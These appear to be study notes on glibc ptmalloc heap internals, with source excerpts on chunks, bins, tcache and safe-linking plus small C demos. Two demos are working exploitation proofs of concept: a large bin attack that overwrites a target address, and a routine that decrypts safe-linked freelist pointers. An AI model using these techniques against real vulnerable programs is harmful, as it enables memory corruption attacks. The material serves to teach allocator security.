struct malloc_chunk {

  INTERNAL_SIZE_T      prev_size;   /* Size of previous chunk (if free).  */
  INTERNAL_SIZE_T      size;        /* Size in bytes, including overhead. */

  struct malloc_chunk* fd;          /* double links -- used only if free. */
  struct malloc_chunk* bk;

  /* Only used for large blocks: pointer to next larger size.  */
  struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
  struct malloc_chunk* bk_nextsize;
};
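As a quick orientation, here is a minimal sketch (assuming a 64-bit glibc) that peeks at a live chunk's size field; the user pointer returned by malloc sits right after the prev_size/size header:

#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    size_t *p = malloc(0x28);   /* request 0x28 -> chunk size 0x30 */
    /* p[-1] is the chunk's size field; on a fresh heap this prints
       0x31, i.e. 0x30 with the PREV_INUSE bit set. */
    printf("size field of p's chunk: %#zx\n", p[-1]);
    return 0;
}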
/* The corresponding word size */
#define SIZE_SZ (sizeof (INTERNAL_SIZE_T))
/* MALLOC_ALIGNMENT is the minimum alignment for malloc'ed chunks. It must be a power of two at least 2 * SIZE_SZ, even on machines for which smaller alignments would suffice. It may be defined as larger than this though. Note however that code and data structures are optimized for the case of 8-byte alignment. */
#ifndef MALLOC_ALIGNMENT
# if !SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_16)
/* This is the correct definition when there is no past ABI to constrain it.

   Among configurations with a past ABI constraint, it differs from
   2*SIZE_SZ only on powerpc32.  For the time being, changing this is
   causing more compatibility problems due to malloc_get_state and
   malloc_set_state than will returning blocks not adequately aligned for
   long double objects under -mlong-double-128.  */
#  define MALLOC_ALIGNMENT       (2 * SIZE_SZ < __alignof__ (long double) \
                                  ? __alignof__ (long double) : 2 * SIZE_SZ)
# else
#  define MALLOC_ALIGNMENT       (2 * SIZE_SZ)
# endif
#endif
/* size field is or'ed with NON_MAIN_ARENA if the chunk was obtained
   from a non-main arena.  This is only set immediately before handing
   the chunk to the user, if necessary.  */
#define NON_MAIN_ARENA 0x4

/* check for chunk from non-main arena */
#define chunk_non_main_arena(p) ((p)->size & NON_MAIN_ARENA)
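A small demonstration of the flag (my own sketch, not part of the glibc source above): the first malloc performed by a new thread creates a non-main arena, so its chunks carry NON_MAIN_ARENA, while main-arena chunks do not. Compile with -lpthread.

#include <stdio.h>
#include <stdlib.h>
#include <pthread.h>

#define NON_MAIN_ARENA 0x4

static void *worker(void *arg)
{
    size_t *p = malloc(0x28);
    printf("thread arena chunk: size field %#zx, NON_MAIN_ARENA %s\n",
           p[-1], (p[-1] & NON_MAIN_ARENA) ? "set" : "clear");
    return NULL;
}

int main(void)
{
    size_t *p = malloc(0x28);
    printf("main arena chunk:   size field %#zx, NON_MAIN_ARENA %s\n",
           p[-1], (p[-1] & NON_MAIN_ARENA) ? "set" : "clear");
    pthread_t t;
    pthread_create(&t, NULL, worker, NULL);
    pthread_join(t, NULL);
    return 0;
}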
struct malloc_state
{
  /* Serialize access.  */
  __libc_lock_define (, mutex);

  /* Flags (formerly in max_fast).  */
  int flags;

  /* Set if the fastbin chunks contain recently inserted free blocks.  */
  /* Note this is a bool but not all targets support atomics on booleans.  */
  int have_fastchunks;

  /* Fastbins */
  mfastbinptr fastbinsY[NFASTBINS];

  /* Base of the topmost chunk -- not otherwise kept in a bin */
  mchunkptr top;

  /* The remainder from the most recent split of a small request */
  mchunkptr last_remainder;

  /* Normal bins packed as described above */
  mchunkptr bins[NBINS * 2 - 2];

  /* Bitmap of bins */
  unsigned int binmap[BINMAPSIZE];

  /* Linked list */
  struct malloc_state *next;

  /* Linked list for free arenas.  Access to this field is serialized
     by free_list_lock in arena.c.  */
  struct malloc_state *next_free;

  /* Number of threads attached to this arena.  0 if the arena is on
     the free list.  Access to this field is serialized by
     free_list_lock in arena.c.  */
  INTERNAL_SIZE_T attached_threads;

  /* Memory allocated from the system in this arena.  */
  INTERNAL_SIZE_T system_mem;
  INTERNAL_SIZE_T max_system_mem;
};
/* An array of bin headers for free chunks. Each bin is doubly linked. The bins are approximately proportionally (log) spaced. There are a lot of these bins (128). This may look excessive, but works very well in practice. Most bins hold sizes that are unusual as malloc request sizes, but are more usual for fragments and consolidated sets of chunks, which is what these bins hold, so they can be found quickly. All procedures maintain the invariant that no consolidated chunk physically borders another one, so each chunk in a list is known to be preceded and followed by either inuse chunks or the ends of memory.
Chunks in bins are kept in size order, with ties going to the approximately least recently used chunk. Ordering isn't needed for the small bins, which all contain the same-sized chunks, but facilitates best-fit allocation for larger chunks. These lists are just sequential. Keeping them in order almost never requires enough traversal to warrant using fancier ordered data structures.
Chunks of the same size are linked with the most recently freed at the front, and allocations are taken from the back. This results in LRU (FIFO) allocation order, which tends to give each chunk an equal opportunity to be consolidated with adjacent freed chunks, resulting in larger free chunks and less fragmentation.
To simplify use in double-linked lists, each bin header acts as a malloc_chunk. This avoids special-casing for headers. But to conserve space and improve locality, we allocate only the fd/bk pointers of bins, and then use repositioning tricks to treat these as the fields of a malloc_chunk*. */
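The "repositioning trick" is the bin_at macro: only the fd/bk pair is stored per bin, and the macro backs the pointer up by offsetof(struct malloc_chunk, fd) so that pair can be addressed as if it were a full chunk. From malloc.c:

typedef struct malloc_chunk *mbinptr;

/* addressing -- note that bin_at(0) does not exist */
#define bin_at(m, i) \
  (mbinptr) (((char *) &((m)->bins[((i) - 1) * 2]))                          \
             - offsetof (struct malloc_chunk, fd))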
In ptmalloc, the bins in the bins array fall into three categories: unsorted bin, small bin, and large bin.

PS: it's a tangle. Knowledge can be handed over, but wisdom you have to work out for yourself qwq
unsorted bin
/* Unsorted chunks
All remainders from chunk splits, as well as all returned chunks, are first placed in the "unsorted" bin. They are then placed in regular bins after malloc gives them ONE chance to be used before binning. So, basically, the unsorted_chunks list acts as a queue, with chunks being placed on it in free (and malloc_consolidate), and taken off (to be either used or placed in bins) in malloc.
The NON_MAIN_ARENA flag is never set for unsorted chunks, so it does not have to be taken into account in size comparisons. */
/* The otherwise unindexable 1-bin is used to hold unsorted chunks.  */
#define unsorted_chunks(M) (bin_at (M, 1))
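A minimal sketch of that queue behaviour (assuming a 64-bit glibc with default tcache; 0x418 is above the tcache range, whose largest request is 0x408, so the chunk really reaches the unsorted bin): a freed chunk parked there is handed straight back when the next request is an exact fit.

#include <stdio.h>
#include <stdlib.h>
#include <assert.h>

int main(void)
{
    size_t *p = malloc(0x418);   /* too large for tcache */
    malloc(0x18);                /* guard so p is not merged into the top chunk */
    free(p);                     /* p now sits in the unsorted bin */
    size_t *q = malloc(0x418);   /* exact fit: taken back off the unsorted bin */
    assert(p == q);
    printf("p %p was reused for q %p\n", (void *)p, (void *)q);
    return 0;
}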
#include <stdio.h>
#include <stdlib.h>
#include <assert.h>

int main()
{
    /* Disable IO buffering to prevent stream from interfering with heap */
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stderr, NULL, _IONBF, 0);

    printf("\n\n");
    printf("Since glibc2.30, two new checks have been enforced on large bin chunk insertion\n\n");
    printf("Check 1 : \n");
    printf("> if (__glibc_unlikely (fwd->bk_nextsize->fd_nextsize != fwd))\n");
    printf(">     malloc_printerr (\"malloc(): largebin double linked list corrupted (nextsize)\");\n");
    printf("Check 2 : \n");
    printf("> if (bck->fd != fwd)\n");
    printf(">     malloc_printerr (\"malloc(): largebin double linked list corrupted (bk)\");\n\n");
    printf("This prevents the traditional large bin attack\n");
    printf("However, there is still one possible path to trigger large bin attack. The PoC is shown below : \n\n");

    size_t target = 0;
    printf("Here is the target we want to overwrite (%p) : %lu\n\n", &target, target);

    size_t *p1 = malloc(0x428);
    printf("First, we allocate a large chunk [p1] (%p)\n", p1-2);
    size_t *g1 = malloc(0x18);
    printf("And another chunk to prevent consolidate\n");

    printf("\n");

    size_t *p2 = malloc(0x418);
    printf("We also allocate a second large chunk [p2] (%p).\n", p2-2);
    printf("This chunk should be smaller than [p1] and belong to the same large bin.\n");
    size_t *g2 = malloc(0x18);
    printf("Once again, allocate a guard chunk to prevent consolidate\n");

    printf("\n");

    free(p1);
    printf("Free the larger of the two --> [p1] (%p)\n", p1-2);
    size_t *g3 = malloc(0x438);
    printf("Allocate a chunk larger than [p1] to insert [p1] into large bin\n");

    printf("\n");

    free(p2);
    printf("Free the smaller of the two --> [p2] (%p)\n", p2-2);
    printf("At this point, we have one chunk in large bin [p1] (%p),\n", p1-2);
    printf("        and one chunk in unsorted bin [p2] (%p)\n", p2-2);

    printf("\n");

    p1[3] = (size_t)((&target)-4);
    printf("Now modify the p1->bk_nextsize to [target-0x20] (%p)\n", (&target)-4);

    printf("\n");

    size_t *g4 = malloc(0x438);
    printf("Finally, allocate another chunk larger than [p2] (%p) to place [p2] (%p) into large bin\n", p2-2, p2-2);
    printf("Since glibc does not check chunk->bk_nextsize if the new inserted chunk is smaller than smallest,\n");
    printf("  the modified p1->bk_nextsize does not trigger any error\n");
    printf("Upon inserting [p2] (%p) into largebin, [p1](%p)->bk_nextsize->fd_nextsize is overwritten to address of [p2] (%p)\n", p2-2, p1-2, p2-2);

    printf("\n");

    printf("In our case here, target is now overwritten to address of [p2] (%p), [target] (%p)\n", p2-2, (void *)target);
    printf("Target (%p) : %p\n", &target, (size_t*)target);

    assert((size_t)(p2-2) == target);

    return 0;
}
/* An array of lists holding recently freed small chunks. Fastbins are not doubly linked. It is faster to single-link them, and since chunks are never removed from the middles of these lists, double linking is not necessary. Also, unlike regular bins, they are not even processed in FIFO order (they use faster LIFO) since ordering doesn't much matter in the transient contexts in which fastbins are normally used.
Chunks in fastbins keep their inuse bit set, so they cannot be consolidated with other free chunks. malloc_consolidate releases all chunks in fastbins and consolidates them with other free chunks. */
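A minimal LIFO sketch (glibc 2.26+ assumed: the 7-slot tcache for this size is filled first so the interesting frees actually land in the fastbin; the later mallocs then pull chunks back partly through tcache stashing):

#include <stdio.h>
#include <stdlib.h>
#include <assert.h>

int main(void)
{
    void *slots[7];
    for (int i = 0; i < 7; i++) slots[i] = malloc(0x18);
    void *a = malloc(0x18);
    void *b = malloc(0x18);

    for (int i = 0; i < 7; i++) free(slots[i]);  /* fill the tcache bin */
    free(a);                                     /* a -> fastbin */
    free(b);                                     /* b -> new fastbin head */

    for (int i = 0; i < 7; i++) malloc(0x18);    /* drain the tcache bin again */
    assert(malloc(0x18) == b);  /* LIFO: last freed comes back first */
    assert(malloc(0x18) == a);
    puts("fastbin returned b before a (LIFO)");
    return 0;
}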
#if USE_TCACHE
/* We want 64 entries.  This is an arbitrary limit, which tunables can reduce.  */
# define TCACHE_MAX_BINS	64
# define MAX_TCACHE_SIZE	tidx2usize (TCACHE_MAX_BINS-1)

/* Only used to pre-fill the tunables.  */
# define tidx2usize(idx)	(((size_t) idx) * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ)

/* When "x" is from chunksize().  */
# define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)
/* When "x" is a user-provided size.  */
# define usize2tidx(x) csize2tidx (request2size (x))

/* With rounding and alignment, the bins are...
   idx 0   bytes 0..24 (64-bit) or 0..12 (32-bit)
   idx 1   bytes 25..40 or 13..20
   idx 2   bytes 41..56 or 21..28
   etc.  */

/* This is another arbitrary limit, which tunables can change.  Each
   tcache bin will hold at most this number of chunks.  */
# define TCACHE_FILL_COUNT 7

/* Maximum chunks in tcache bins for tunables.  This value must fit the range
   of tcache->counts[] entries, else they may overflow.  */
# define MAX_TCACHE_COUNT UINT16_MAX
#endif
TCACHE_MAX_BINS = 64: there are at most 64 size classes (bins)
TCACHE_FILL_COUNT = 7: each bin caches at most 7 chunks by default
MAX_TCACHE_COUNT: upper bound on a single bin's counter (to prevent tcache->counts[] overflow)
MAX_TCACHE_SIZE: the largest chunk size tcache can manage
These macros also define the chunk size <-> tcache bin index conversion: each bin covers one contiguous size range, stepping up by MALLOC_ALIGNMENT (16 bytes on 64-bit). A quick sanity check is sketched below.
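The macro values here are copied from the glibc definitions above, assuming 64-bit defaults (SIZE_SZ = 8, MALLOC_ALIGNMENT = 0x10, MINSIZE = 0x20):

#include <assert.h>

#define MINSIZE          0x20
#define MALLOC_ALIGNMENT 0x10
#define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)

int main(void)
{
    assert(csize2tidx(0x20)  == 0);   /* malloc(0x00..0x18)   -> chunk 0x20 */
    assert(csize2tidx(0x30)  == 1);   /* malloc(0x19..0x28)   -> chunk 0x30 */
    assert(csize2tidx(0x410) == 63);  /* malloc(0x3f9..0x408) -> chunk 0x410, the last tcache bin */
    return 0;
}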
struct malloc_chunk {

  size_t               mchunk_prev_size;  /* Size of previous chunk (if free).  */
  size_t               mchunk_size;       /* Size in bytes, including overhead. */

  struct malloc_chunk* fd;                /* double links -- used only if free. */
  struct malloc_chunk* bk;

  /* Only used for large blocks: pointer to next larger size.  */
  struct malloc_chunk* fd_nextsize;       /* double links -- used only if free. */
  struct malloc_chunk* bk_nextsize;
};
/* The corresponding word size.  */
#define SIZE_SZ (sizeof (size_t))

/* The corresponding bit mask value.  */
#define MALLOC_ALIGN_MASK (MALLOC_ALIGNMENT - 1)

/* The smallest possible chunk */
#define MIN_CHUNK_SIZE (offsetof(struct malloc_chunk, fd_nextsize))

/* The smallest size we can malloc is an aligned minimal chunk */
#define MINSIZE \
  (unsigned long)(((MIN_CHUNK_SIZE + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK))

/* When "x" is from chunksize().  */
# define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)

/* When "x" is a user-provided size.  */
# define usize2tidx(x) csize2tidx (request2size (x))
int main()
{
    unsigned long long req;
    unsigned long long tidx;

    fprintf(stderr, "This file doesn't demonstrate an attack, but calculates the tcache idx for a given chunk size.\n");
    fprintf(stderr, "The basic formula is as follows:\n");
    fprintf(stderr, "\tIDX = (CHUNKSIZE - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT\n");
    fprintf(stderr, "\tOn a 64 bit system the current values are:\n");
    fprintf(stderr, "\t\tMINSIZE: 0x%lx\n", MINSIZE);
    fprintf(stderr, "\t\tMALLOC_ALIGNMENT: 0x%lx\n", MALLOC_ALIGNMENT);
    fprintf(stderr, "\tSo we get the following equation:\n");
    fprintf(stderr, "\tIDX = (CHUNKSIZE - 0x%lx) / 0x%lx\n\n", MINSIZE-MALLOC_ALIGNMENT+1, MALLOC_ALIGNMENT);
    fprintf(stderr, "BUT be AWARE that CHUNKSIZE is not the x in malloc(x)\n");
    fprintf(stderr, "It is calculated as follows:\n");
    fprintf(stderr, "\tIF x + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE(0x%lx): CHUNKSIZE = MINSIZE (0x%lx)\n", MINSIZE, MINSIZE);
    fprintf(stderr, "\tELSE: CHUNKSIZE = (x + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK\n");
    fprintf(stderr, "\t=> CHUNKSIZE = (x + 0x%lx + 0x%lx) & ~0x%lx\n\n\n", SIZE_SZ, MALLOC_ALIGN_MASK, MALLOC_ALIGN_MASK);

    while(1) {
        fprintf(stderr, "[CTRL-C to exit] Please enter a size x (malloc(x)) in hex (e.g. 0x10): ");
        scanf("%llx", &req);
        tidx = usize2tidx(req);
        if (tidx > 63) {
            fprintf(stderr, "\nWARNING: NOT IN TCACHE RANGE!\n");
        }
        fprintf(stderr, "\nTCache Idx: %llu\n", tidx);
    }
    return 0;
}
/* Safe-Linking:
   Use randomness from ASLR (mmap_base) to protect single-linked lists
   of Fast-Bins and TCache.  That is, mask the "next" pointers of the
   lists' chunks, and also perform allocation alignment checks on them.
   This mechanism reduces the risk of pointer hijacking, as was done with
   Safe-Unlinking in the double-linked lists of Small-Bins.
   It assumes a minimum page size of 4096 bytes (12 bits).  Systems with
   larger pages provide less entropy, although the pointer mangling
   still works.  */
#define PROTECT_PTR(pos, ptr) \
  ((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
#define REVEAL_PTR(ptr)  PROTECT_PTR (&ptr, ptr)
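A round-trip sketch of the mangling (the macro is copied from above; the same XOR both protects and reveals because pos, the address of the field holding the pointer, is known):

#include <stdio.h>
#include <stdlib.h>
#include <assert.h>

#define PROTECT_PTR(pos, ptr) \
  ((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))

int main(void)
{
    void *a = malloc(0x18);
    void *b = malloc(0x18);
    /* pretend a's first qword is a tcache/fastbin "next" field pointing to b */
    void **next_field = (void **)a;
    *next_field = PROTECT_PTR(next_field, b);            /* what glibc stores */
    printf("mangled:   %p\n", *next_field);
    assert(PROTECT_PTR(next_field, *next_field) == b);   /* same XOR undoes it */
    printf("recovered: %p\n", PROTECT_PTR(next_field, *next_field));
    return 0;
}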
#include <stdio.h>
#include <stdlib.h>
#include <assert.h>

long decrypt(long cipher)
{
    puts("The decryption uses the fact that the first 12bit of the plaintext (the fwd pointer) is known,");
    puts("because of the 12bit sliding.");
    puts("And the key, the ASLR value, is the same as the leading bits of the plaintext (the fwd pointer)");
    long key = 0;
    long plain;

    for(int i = 1; i < 6; i++) {
        /* each round recovers 12 more bits, from the top of the pointer down */
        int bits = 64 - 12*i;
        if (bits < 0) bits = 0;
        plain = ((cipher ^ key) >> bits) << bits;
        key = plain >> 12;
        printf("round %d:\n", i);
        printf("key:    %#016lx\n", key);
        printf("plain:  %#016lx\n", plain);
        printf("cipher: %#016lx\n\n", cipher);
    }
    return plain;
}
int main()
{
    /*
     * This technique demonstrates how to recover the original content from a poisoned
     * value because of the safe-linking mechanism.
     * The attack uses the fact that the first 12 bit of the plaintext (pointer) is known
     * and the key (ASLR slide) is the same as the pointer's leading bits.
     * As a result, as long as the chunk where the pointer is stored is at the same page
     * of the pointer itself, the value of the pointer can be fully recovered.
     * Otherwise, we can also recover the pointer with the page-offset between the storer
     * and the pointer. What we demonstrate here is a special case whose page-offset is 0.
     * For demonstrations of other more general cases, plz refer to
     * https://github.com/n132/Dec-Safe-Linking
     */
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);

    // step 1: allocate chunks
    long *a = malloc(0x20);
    long *b = malloc(0x20);
    printf("First, we create chunk a @ %p and chunk b @ %p\n", a, b);
    malloc(0x10);
    puts("And then create a padding chunk to prevent consolidation.");

    // step 2: free chunks
    puts("Now free chunk a and then free chunk b.");
    free(a);
    free(b);
    printf("Now the freelist is: [%p -> %p]\n", b, a);
    printf("Due to safe-linking, the value actually stored at b[0] is: %#lx\n", b[0]);

    // step 3: recover the values
    puts("Now decrypt the poisoned value");
    long plaintext = decrypt(b[0]);
    printf("Decrypted fd of b: %#lx\n", plaintext);
    assert(plaintext == (long)a);
    return 0;
}